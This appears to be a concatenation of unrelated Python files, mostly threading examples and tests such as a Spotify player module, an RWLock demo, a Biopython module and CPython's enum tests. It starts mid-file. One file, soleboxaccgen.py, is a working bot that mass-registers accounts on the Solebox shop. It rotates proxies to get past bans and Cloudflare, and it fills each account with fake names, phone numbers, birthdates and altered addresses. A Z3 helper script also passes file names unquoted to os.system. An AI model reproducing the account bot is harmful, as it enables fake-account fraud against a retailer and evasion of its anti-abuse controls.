'track_index': -1,
'timestamp': time.time()
}
if not context:
return now_playing
if (context['type'] == 'playlist'):
uri = context['uri']
playlist = DATASTORE.getPlaylistUri(uri)
tracks = DATASTORE.getPlaylistTracks(uri)
if (not playlist):
playlist, tracks = get_playlist(uri.split(":")[-1])
DATASTORE.setPlaylist(playlist, tracks)
now_playing['track_index'] = next(x for x, val in enumerate(tracks)
if val.uri == track_uri) + 1
now_playing['track_total'] = len(tracks)
now_playing['context_name'] = playlist.name
elif (context['type'] == 'album'):
uri = context['uri']
album = DATASTORE.getAlbumUri(uri)
tracks = DATASTORE.getPlaylistTracks(uri)
if (not album):
album, tracks = get_album(uri.split(":")[-1])
DATASTORE.setAlbum(album, tracks)
now_playing['track_index'] = next(x for x, val in enumerate(tracks)
if val.uri == track_uri) + 1
now_playing['track_total'] = len(tracks)
now_playing['context_name'] = album.name
return now_playing
def search(query):
track_results = sp.search(query, limit=5, type='track')
tracks = []
for _, item in enumerate(track_results['tracks']['items']):
tracks.append(UserTrack(item['name'], item['artists'][0]['name'], item['album']['name'], item['uri']))
artist_results = sp.search(query, limit=5, type='artist')
artists = []
for _, item in enumerate(artist_results['artists']['items']):
artists.append(UserArtist(item['name'], item['uri']))
album_results = sp.search(query, limit=5, type='album')
albums = []
album_track_map = {}
for _, item in enumerate(album_results['albums']['items']):
album, album_tracks = parse_album(item)
albums.append(album)
album_track_map[album.uri] = album_tracks
return SearchResults(tracks, artists, albums, album_track_map)
def refresh_now_playing():
DATASTORE.now_playing = get_now_playing()
def play_next():
global sleep_time
sp.next_track()
sleep_time = 0.4
refresh_now_playing()
def play_previous():
global sleep_time
sp.previous_track()
sleep_time = 0.4
refresh_now_playing()
def pause():
global sleep_time
sp.pause_playback()
sleep_time = 0.4
refresh_now_playing()
def resume():
global sleep_time
sp.start_playback()
sleep_time = 0.4
refresh_now_playing()
def toggle_play():
now_playing = DATASTORE.now_playing
if not now_playing:
return
if now_playing['is_playing']:
pause()
else:
resume()
def bg_loop():
global sleep_time
while True:
refresh_now_playing()
time.sleep(sleep_time)
sleep_time = min(4, sleep_time * 2)
sleep_time = 0.3
thread = threading.Thread(target=bg_loop, args=())
thread.daemon = True # Daemonize thread
thread.start()
def run_async(fun):
threading.Thread(target=fun, args=()).start()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for k in range(0,1000001):
i+=1
def decrementingFunction():
global i
for k in range(0,1000001):
i-=1
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
example.py
|
from threading import Thread
from rwmutex import RWLock
from time import sleep
lock = RWLock()
shared_resource = ""
def do_writes():
global lock
global shared_resource
print("writer thread waiting for write lock")
with lock.write:
print("writer thread received write lock")
for i in range(10):
print(f"writing {i}")
shared_resource += f"{i} "
sleep(1)
print("writer thread will yield write lock")
def do_read(id):
global lock
global shared_resource
print(f"reader thread {id} waiting for read lock")
with lock.read:
print(f"reader thread {id} received read lock")
print(f"reader thread {id} found '{shared_resource}'")
print(f"reader thread {id} will yield read lock")
threads = []
writer_thread = Thread(target=do_writes, daemon=True)
writer_thread.start()
threads.append(writer_thread)
for i in range(5):
reader_thread = Thread(target=do_read, args=[i])
reader_thread.start()
threads.append(reader_thread)
for t in threads:
t.join()
|
Local.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Asynchronous local execution (DEPRECATED).
Supports multicore architectures.
"""
import threading
from Bio.PopGen.Async import Async
class Local(Async):
"""Execution on Local machine."""
def __init__(self, num_cores=1):
"""Constructor.
parameters:
- num_cores - Number of cores (for multiprocessor machines,
multiply accordingly)
"""
Async.__init__(self)
self.num_cores = num_cores
self.cores_used = 0
def _run_program(self, id, hook, parameters, input_files):
"""Run program.
For parameters, please check Async.run_program.
Either runs a program if a core is available or
schedules it.
"""
self.access_ds.acquire()
self.waiting.append((id, hook, parameters, input_files))
if self.cores_used < self.num_cores:
self.cores_used += 1
threading.Thread(target=self.start_work).run()
self.access_ds.release()
def start_work(self):
"""Starts work.
Thread initial point.
While there are tasks to be done, runs them.
The thread dies as soon as there is nothing waiting to be
executed.
"""
self.access_ds.acquire()
while (len(self.waiting) > 0):
id, hook, parameters, input_files = self.waiting[0]
del self.waiting[0]
self.running[id] = True
self.access_ds.release()
ret_code, output_files = hook.run_job(parameters, input_files)
self.access_ds.acquire()
del self.running[id]
self.done[id] = ret_code, output_files
self.cores_used -= 1
self.access_ds.release()
|
udp_server.py
|
import socketserver
import threading
class serverUDP:
message = ''
class MyUDPHandler(socketserver.DatagramRequestHandler):
def handle(self):
self.wfile.write(serverUDP.message.encode())
def __init__(self, server_ip, server_port):
self.server_port = server_port
self.server_IP = server_ip
self.serverAddress = (server_ip, server_port)
self.serverUDP = socketserver.UDPServer(self.serverAddress, self.MyUDPHandler)
self.notification_thread = threading.Thread(target=self.serverUDP.serve_forever)
self.notification_thread.start()
def update_message(self, message):
serverUDP.message = message
|
filter_long_models.py
|
#!/usr/bin/python3
import os, subprocess
from multiprocessing import Process, Semaphore
# https://stackoverflow.com/questions/32855812/create-a-compress-function-in-python
def compress(string):
if string == '': return ''
res = ""
count = 1
# Add in first character
res += string[0]
# Iterate through loop, skipping last one
for i in range(len(string)-1):
if string[i] == string[i+1]:
count += 1
else:
# if count > 1:
# # Ignore if no repeats
# res += str(count)
res += string[i+1]
count = 1
# print last one
# if count > 1:
# res += str(count)
return res
def move_file(file):
if os.path.exists(file):
try:
p = subprocess.run(f"~/z3-4.8.12 {file} -model", shell=True, capture_output=True, executable='/bin/bash', timeout=60)
temp_str = ''
max_str = ''
max_length = 0
for ch in str(p.stdout):
if ch == '"':
if temp_str == '':
temp_str += ch
else:
assert temp_str.startswith('"')
temp_str = compress(temp_str[1:])
if len(temp_str) > max_length:
max_str = temp_str
max_length = len(temp_str)
temp_str = ''
elif temp_str != '':
temp_str += ch
assert temp_str == ''
if max_length > 6:
os.system(f'mv {file} benchmark_long_sat/')
else:
os.system(f'cp {file} benchmark_current_bugs/')
print(file, max_length, max_str)
except subprocess.TimeoutExpired as e:
print(file, e.timeout)
os.system(f'cp {file} benchmark_current_bugs/')
semaphore = Semaphore(256)
def one_function(file):
semaphore.acquire()
move_file(file)
# print(','.join(result_list))
semaphore.release()
p = subprocess.run(f"cat statistics/b79257b4e94d7c5a19686b408fa076f0c99418f3_large_10.csv | grep _sat | grep ,unsat | cut -d, -f1", shell=True, capture_output=True, executable='/bin/bash')
try:
for file in map(lambda x: x.decode('utf-8'), p.stdout.splitlines()):
semaphore.acquire(); semaphore.release()
t = Process(target=one_function, args=(file,))
t.start()
except Exception as e:
print(e)
for i in range(256):
semaphore.acquire()
|
soleboxaccgen.py
|
#### made by: rtuna#4321 | @rTunaboss
#### Working on Python 3.8.0
print(r'''
____ ____ _ _ ______ __ __ _
| _ \ / __ \ | \ | ||___ / /\ \ \ / /(_)
| |_) || | | || \| | / / / \ \ \_/ / _ ___
| _ < | | | || . ` | / / / /\ \ \ / | | / _ \
| |_) || |__| || |\ | / /__ / ____ \ | | _ | || (_) |
|____/ \____/ |_| \_|/_____|/_/ \_\|_|(_)|_| \___/
''')
print(" • made by: rtuna#4321 | @rTunaboss")
print(" • for personal use only")
print('-------------------------------------\n')
#################### Settings [Feel free to modify this] ####################
how_many = None
# how_many = 1
while not how_many:
try:
how_many = int(input("How many accounts would you like to create?\n"))
except ValueError:
print("This is not an integer. Try again...")
jigFirstAndLast = False #or True
jigFirst = False #or True
jigPhone = True #or False
jigFirstLineAddress = True #or False
#TODO ^for some reason if you set this to False, the account generation stops working (Fake Success)
jigSecondLineAddress = True #or False
#TODO Also make sure you fill in everything in the userdata.json file.
#-------------------------------- DO NOT MODIFY THE CODE BELOW UNLESS YOU KNOW WHAT YOU'RE DOING --------------------------------#
#################### Importing necessary libraries ####################
try:
import requests
from bs4 import BeautifulSoup as bs
from names import get_first_name, get_last_name
import random
import time
import datetime
import threading
import cfscrape
import json
import os
from colorama import Fore, Style, init
from discord_webhook import DiscordWebhook, DiscordEmbed
except:
print('[FATAL ERROR] -> "Some dependencies are not installed."')
print('!!! Make sure you read and do EVERYTHING in the "Before running" section of the README.md file on Github !!!')
print('Available from:\thttps://github.com/rtunaboss/SoleboxAccountGenerator')
input()
quit()
init(autoreset=True)
class logger:
print_lock = threading.Lock()
#################### Defining non-account specific functions ####################
def gettime():
now = str(datetime.datetime.now())
now = now.split(' ')[1]
threadname = threading.currentThread().getName()
threadname = str(threadname).replace('Thread', 'Task')
now = '[' + str(now) + ']' + ' ' + '[' + str(threadname) + ']'
return now
def send_webhook(webhook_url, email, passwd):
hook = DiscordWebhook(url=webhook_url, username="rTuna's Solebox Gen", avatar_url='https://avatars1.githubusercontent.com/u/38296319?s=460&v=4')
color=15957463
embed = DiscordEmbed(
title = 'Account successfully created!',
color=color,
url='https://github.com/rtunaboss/SoleboxAccountGenerator',
)
embed.set_footer(text=f'BONZAY Solebox • {datetime.datetime.now().strftime("%Y-%m-%d %H:%M")}',icon_url='https://cdn.discordapp.com/attachments/527830358767566848/622854816120569887/Bonzay.png')
embed.add_embed_field(name='Username', value=f'{email}')
embed.add_embed_field(name='Password', value=f'||{passwd}||', inline=False)
hook.add_embed(embed)
hook.execute()
def loadProxyUserPass(filename):
global proxyList
with open(filename + '.txt') as f:
file_content = f.read()
file_rows = file_content.split('\n')
for i in range(0, len(file_rows)):
if ':' in file_rows[i]:
tmp = file_rows[i]
tmp = tmp.split(':')
proxies = {'http': 'http://' + tmp[2] + ':' + tmp[3] + '@' + tmp[0] + ':' + tmp[1] + '/',
'https': 'http://' + tmp[2] + ':' + tmp[3] + '@' + tmp[0] + ':' + tmp[1] + '/'}
proxyList.append(proxies)
def loadProxyIpAuth(filename):
with open(filename + '.txt') as f:
file_content = f.read()
tmp = file_content.split('\n')
for n in range(0, len(tmp)):
if ':' in tmp[n]:
temp = tmp[n]
proxies = {'http': 'http://' + temp, 'https': 'http://' + temp}
proxyList.append(proxies)
def saveEmail(email, passwd):
with open('valid_emails.txt', 'a') as f:
f.write(f'{email}:{passwd}\n')
def saveNoShipEmail(email, passwd):
with open('no_ship_addy_emails.txt', 'a') as f:
f.write(f'{email}:{passwd}\n')
def getStoken(s):
try:
with logger.print_lock:
print(gettime() + ' [STATUS] -> Trying to scrape stoken...')
index_url = 'https://www.solebox.com/en/my-account/'
index_r = s.get(url=index_url, headers=headers)
if 'captcha.js' in index_r.text:
print(Fore.RED + gettime() + ' [ERROR] -> Encountered CloudFare.')
return
if index_r.status_code == 200:
soup = bs(index_r.text, 'lxml')
stoken = soup.find('input', {'name': 'stoken'})['value']
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + f' [SUCCESS] -> Successfully scraped stoken: {stoken} !')
return stoken
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Bad request. Satus code %d, unable to get stoken...' % index_r.status_code)
return
except:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Unable to get stoken.')
def scrapeCountryIds():
country_data = {}
with logger.print_lock:
print(gettime() + ' [STATUS] -> Scraping country IDs...')
s = cfscrape.create_scraper()
r = s.get(url='https://www.solebox.com/', headers=headers)
soup = bs(r.text, 'lxml')
countrySelection = soup.find('select', {'id':'invCountrySelect'})
countryValues = countrySelection.contents
for val in countryValues:
# scraped info is separate by new lines which we want to skip
if val == '\n':
continue
else:
country_id = val['value']
country_name = val.text
country_data[country_name] = country_id
with open('countrydata.json', 'w') as f:
json.dump(country_data, f)
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Country IDs scraped!')
def getCountryId(country_name):
with open('countrydata.json', 'r') as f:
country_data = json.loads(f.read())
try:
country_id = country_data[country_name]
return country_id
except:
print(Fore.RED + gettime() + ' [ERROR] -> Error getting country_id, check your country name in userdata.json!')
#################### Loading data and initializing other later used variables ####################
with open('useragents.txt', 'r') as f:
# with open('commonagents.txt', 'r') as f:
useragents = f.read()
useragents = useragents.split('\n')
with open('userdata.json', 'r') as f:
userData = json.loads(f.read())
webhook_url = userData['webhook_url']
firstName = userData['firstName']
if firstName == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your firstName!')
input()
quit()
lastName = userData['lastName']
if lastName == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your lastName!')
input()
quit()
phoneNum = userData['phoneNum']
if phoneNum == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your phoneNum!')
input()
quit()
passwd = userData['passwd']
if passwd == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your passwd!')
input()
quit()
addyFirstLine = userData['addyFirstLine']
if addyFirstLine == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your addyFirstLine!')
input()
quit()
houseNum = userData['houseNum']
if houseNum == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your houseNum!')
input()
quit()
zipcode = userData['zipcode']
if zipcode == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your zipcode!')
input()
quit()
city = userData['city']
if city == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your city!')
input()
quit()
country_name = userData['country_name']
if country_name == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your country_name!')
input()
quit()
stateUS = userData['stateUS']
if len(stateUS) > 2:
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your State settings! Correct formatting: "NY" or "TX"')
addySecondLine = userData['addySecondLine']
catchall = userData['catchall']
if catchall == '':
catchall = 'gmail.com'
if '@' in catchall:
catchall = catchall.replace('@', '')
country_id = getCountryId(country_name)
if country_id == None:
input()
quit()
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8,cs;q=0.7,de;q=0.6',
# 'cache-control': 'max-age=0',
'content-type':'application/x-www-form-urlencoded',
'upgrade-insecure-requests': '1',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
}
linetwolist = ['apt', 'apartment', 'dorm', 'suite', 'unit', 'house', 'unt', 'room', 'floor']
#################### Main function ####################
def generateAccount():
########## Initializing a session & getting stoken ##########
useragent = random.choice(useragents)
headers['user-agent'] = useragent
# headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0'
with logger.print_lock:
print(gettime() + ' [STATUS] -> Account generation has started...')
# s = cfscrape.create_scraper()
s = requests.Session()
if proxyList:
proxy_is_bad = True
while proxy_is_bad:
s.proxies = random.choice(proxyList)
with logger.print_lock:
print(gettime() + ' [STATUS] -> Checking proxy...')
test = s.get('https://www.solebox.com/', headers=headers)
if test.status_code in (302, 200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Proxy working...')
proxy_is_bad = False
elif 'captcha.js' in test.text:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Encountered CloudFare, rotating proxy...')
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Proxy banned, rotating proxy...')
time.sleep(1)
stoken = getStoken(s)
if stoken is None:
return
time.sleep(1)
s.get(url='https://www.solebox.com/en/open-account/', headers=headers)
########## Jigging info ##########
global firstName, lastName, phoneNum, jiggedFirstLineAddress, jiggedSecondLineAddress
if jigFirstAndLast:
firstName = get_first_name()
lastName = get_last_name()
elif jigFirst:
firstName = get_first_name()
if jigPhone:
phoneNum = f'+1{random.randint(300,999)}{random.randint(300,999)}{random.randint(300,999)}'
if jigFirstLineAddress:
jiggedFirstLineAddress = f'{2*(chr(random.randint(97,97+25)).upper() + chr(random.randint(97,97+25)).upper())} {addyFirstLine}'
else:
jiggedFirstLineAddress = addyFirstLine
if jigSecondLineAddress:
jiggedSecondLineAddress = f'{random.choice(linetwolist)} {random.randint(1,20)}{chr(random.randint(97,97+25)).upper()}'
else:
jiggedSecondLineAddress = addySecondLine
email = f'{get_first_name()}{random.randint(1,9999999)}@{catchall}'
time.sleep(0.5)
with logger.print_lock:
print(gettime() + ' [STATUS] -> Trying to create an account...')
########## Configuring payload for registering and POSTing it to create an account ##########
register_payload = {
'stoken': stoken,
'lang': '1',
'listtype': '',
'actcontrol': 'register',
'fnc': 'registeruser',
'cl': 'register',
'lgn_cook' : 0,
'reloadaddress': '',
'blshowshipaddress': 1,
'option' : 3,
'invadr[oxuser__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'invadr[oxuser__oxfname]': firstName,
'invadr[oxuser__oxlname]': lastName,
'invadr[oxuser__oxstreet]': jiggedFirstLineAddress,
'invadr[oxuser__oxstreetnr]': houseNum,
'invadr[oxuser__oxaddinfo]': jiggedSecondLineAddress,
'invadr[oxuser__oxzip]': zipcode,
'invadr[oxuser__oxcity]': city,
'invadr[oxuser__oxcountryid]': country_id,
'invadr[oxuser__oxstateid]': stateUS,
'invadr[oxuser__oxbirthdate][day]': random.randint(1, 31),
'invadr[oxuser__oxbirthdate][month]': random.randint(1, 12),
'invadr[oxuser__oxbirthdate][year]': random.randint(1950, 2003),
'invadr[oxuser__oxfon]': phoneNum,
'lgn_usr': email,
'lgn_pwd': passwd,
'lgn_pwd2': passwd,
'save' : 'Save',
}
register_post = s.post(url='https://www.solebox.com/index.php?lang=1&', headers=headers, data=register_payload, allow_redirects=False)
if register_post.status_code in (302, 200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Successfully created an account.')
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> ERROR %d occurred: Unable to create an account.' % register_post.status_code)
return
time.sleep(1)
with logger.print_lock:
print(gettime() + ' [STATUS] -> Trying to update accounts shipping details.')
########## Updating shipping address ##########
s.get(url='https://www.solebox.com/en/my-address/', headers=headers)
update_shipping_payload = {
'stoken': stoken,
'lang': '1',
'listtype': '',
'actcontrol': 'account_user',
'fnc': 'changeuser_testvalues',
'cl': 'account_user',
'CustomError': 'user',
'blshowshipaddress': '1',
'invadr[oxuser__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'invadr[oxuser__oxfname]': firstName,
'invadr[oxuser__oxlname]': lastName,
'invadr[oxuser__oxstreet]': jiggedFirstLineAddress,
'invadr[oxuser__oxstreetnr]': houseNum,
'invadr[oxuser__oxaddinfo]': jiggedSecondLineAddress,
'invadr[oxuser__oxzip]': zipcode,
'invadr[oxuser__oxcity]': city,
'invadr[oxuser__oxcountryid]': country_id,
'invadr[oxuser__oxstateid]': stateUS,
'changeClass': 'account_user',
'deladr[oxaddress__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'deladr[oxaddress__oxfname]': firstName,
'deladr[oxaddress__oxlname]': lastName,
'deladr[oxaddress__oxcompany]': '',
'deladr[oxaddress__oxstreet]': jiggedFirstLineAddress,
'deladr[oxaddress__oxstreetnr]': houseNum,
'deladr[oxaddress__oxaddinfo]': jiggedSecondLineAddress,
'deladr[oxaddress__oxzip]': zipcode,
'deladr[oxaddress__oxcity]': city,
'deladr[oxaddress__oxcountryid]': country_id,
'deladr[oxaddress__oxstateid]': stateUS,
'deladr[oxaddress__oxfon]': phoneNum,
}
time.sleep(1)
update_shipping_post = s.post(url='https://www.solebox.com/index.php?lang=1&', headers=headers, data=update_shipping_payload)
if update_shipping_post.status_code in (302,200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Successfully updated accounts shipping details.')
saveEmail(email, passwd)
if webhook_url:
send_webhook(webhook_url, email, passwd)
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> ERROR occurred: Unable to edit shipping details.')
saveNoShipEmail(email, passwd)
#################### Loading proxies ####################
proxyList = []
try:
loadProxyUserPass('proxies')
except:
loadProxyIpAuth('proxies')
with logger.print_lock:
print(Style.BRIGHT + Fore.CYAN + 'SOLEBOX ACCOUNT GENERATOR + SHIPPING ADDRESS UPDATER')
totalproxies = len(proxyList)
if int(totalproxies) == 0:
with logger.print_lock:
print('No proxies loaded.')
else:
with logger.print_lock:
print('Loaded ' + Style.BRIGHT + f'{totalproxies}' + Style.NORMAL + ' proxies!')
#################### Generating accounts ####################
########## Checking if countryids are scraped ##########
if os.stat('countrydata.json').st_size == 0:
scrapeCountryIds()
########## Generating the number of accounts specified ##########
print('[STATUS] -> Account generation has started...')
if not proxyList:
if how_many < 3:
for acc in range(how_many):
generateAccount()
else:
with logger.print_lock:
print(Fore.YELLOW + gettime() + ' [WARNING] -> You are trying to create more than 3 accounts with no proxies! Add some proxies and try again.')
# generateAccount()
else:
threads = []
while (how_many / 10 >= 1):
for acc in range(10):
t = threading.Thread(target=generateAccount)
threads.append(t)
t.start()
how_many -= 10
time.sleep(0.5)
print('[STATUS] -> Sleeping for 60sec...')
time.sleep(60)
for t in threads:
t.join()
if (how_many != 0):
for acc in range(how_many):
t = threading.Thread(target=generateAccount)
threads.append(t)
t.start()
time.sleep(0.5)
for t in threads:
t.join()
|
test_sft.py
|
from sys import path
import threading
import time
from sft.listener import SFTListener
from sft.client import SFTClientResponser
from sft.protocol.definition import SFTProtocols, SFTRoles
from hks_pylib.logger import Display
from hks_pylib.logger import StandardLoggerGenerator
from hks_pylib.logger.standard import StdUsers, StdLevels
from hks_pylib.cryptography.ciphers.symmetrics import AES_CTR
KEY = b"0123456789abcedffedcba9876543210"
def run_server(role, is_activate):
logger_generator = StandardLoggerGenerator("tests/sft.{}.log".format(role.name))
listener = SFTListener(
cipher=AES_CTR(KEY),
address=("127.0.0.1", 2000),
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL},
buffer_size=10**8,
)
listener.get_scheme(
SFTProtocols.SFT,
SFTRoles.RECEIVER
).config(directory="tests/")
_print = logger_generator.generate("SFT Listener",
{StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL})
listener.listen()
responser = listener.accept(start_responser=True)
listener.close()
if is_activate:
if role == SFTRoles.RECEIVER:
responser.activate(SFTProtocols.SFT, role, token="tests/file.500MB")
else:
responser.activate(SFTProtocols.SFT, role, path="tests/file.500MB", token="default")
result = responser.wait_result(SFTProtocols.SFT, role, timeout=60)
_print(StdUsers.USER, StdLevels.INFO, "Result:", result)
responser.close()
def run_client(role, is_activate):
logger_generator = StandardLoggerGenerator("tests/sft.{}.log".format(role.name))
client = SFTClientResponser(
cipher=AES_CTR(KEY),
address=("127.0.0.1", 2000),
name="SFTClient",
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL},
buffer_size=10**8
)
client.get_scheme(
SFTProtocols.SFT,
SFTRoles.RECEIVER
).config(directory="tests/")
_print = logger_generator.generate("SFT Client",
{StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL})
client.connect()
client.start(thread=True)
if is_activate:
if role == SFTRoles.RECEIVER:
client.activate(SFTProtocols.SFT, role, token="tests/file.500MB")
else:
client.activate(SFTProtocols.SFT, role, path="tests/file.500MB", token="default")
result = client.wait_result(SFTProtocols.SFT, role, timeout=60)
client.close()
_print(StdUsers.USER, StdLevels.INFO, "Result:", result)
def test_sft():
t1 = threading.Thread(target=run_server, args=(SFTRoles.RECEIVER, True), name="SERVER")
t1.start()
time.sleep(1)
t2 = threading.Thread(target=run_client, args=(SFTRoles.SENDER, False), name="CLIENT")
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
test_sft()
|
camatrix_mult_test.py
|
from math import log10
from threading import Thread
from random import randint
from time import time
import unittest
from pprint import pprint
def threadCompare(A, B, i, j, maxi):
if maxi[0] < A[i][j] : maxi[0] = A[i][j]
if maxi[0] < B[i][j] : maxi[0] = B[i][j]
def threadOne_New(A, C, i, j, P):
C[i] = C[i]*10**(P) + A[i][j]
def threadTwo_New(B, D, i, j, P, N):
D[j] = D[j]*10**(P) + B[N - 1 - i][j]
def threadThree_New(E, C, D, i, j, P, N) :
E[i][j] = int(C[i]*D[j]/(10**(P*(N - 1))))%(10**P)
def new_matrix_multiply(A, B):
N = len(A)
maxi = [0]
threadSeries = [[Thread(target = threadCompare, args =(A, B, i, j, maxi,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeries[i][j].start()
for i in range(N):
for j in range(N): threadSeries[i][j].join()
M = int(log10(maxi[0]))+1
P = int(log10((10**(2*M)-1)*N))+1
C, D, E = [0 for i in range(N)], [0 for i in range(N)], [[0 for j in range(N)] for i in range(N)]
threadSeriesOne = [[Thread(target = threadOne_New, args =(A, C, i, j, P,)) for j in range(N)] for i in range(N)]
threadSeriesTwo = [[Thread(target = threadTwo_New, args =(B, D, i, j, P, N,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeriesOne[i][j].start()
for i in range(N):
for j in range(N): threadSeriesOne[i][j].join()
for i in range(N):
for j in range(N): threadSeriesTwo[i][j].start()
for i in range(N):
for j in range(N): threadSeriesTwo[i][j].join()
threadSeriesThree = [[Thread(target = threadThree_New, args =(E, C, D, i, j, P, N,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeriesThree[i][j].start()
for i in range(N):
for j in range(N): threadSeriesThree[i][j].join()
return E
def ijk_method(A,B):
N = len(A)
C = [[0 for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N):
for k in range(N): C[i][j] = C[i][j] + A[i][k]*B[k][j]
return C
class TestCAMatrixProduct(unittest.TestCase):
def test_RandomMatrix1(self):
N = randint(1,3)
A = [ [ randint(1,5) for j in range(N) ] for i in range(N) ]
B = [ [ randint(1,5) for j in range(N) ] for i in range(N) ]
self.assertEquals(ijk_method(A,B),new_matrix_multiply(A,B),msg='Mismatch')
def test_suite():
suite = unittest.TestSuite()
for i in range(20): suite.addTest(unittest.makeSuite(TestCAMatrixProduct))
return suite
test = test_suite()
result = unittest.TestResult()
test.run(result)
print 'Number of given tests',result.testsRun
print 'Number of erroneous tests',len(result.errors)
if len(result.errors) != 0:
print 'Erroneous tests'
pprint(result.errors)
print 'Number of tests that failed',len(result.failures)
if len(result.failures) != 0:
print 'Failed tests'
pprint(result.failures)
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
MODULE = ('test.test_enum', '__main__')[__name__=='__main__']
SHORT_MODULE = MODULE.split('.')[-1]
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
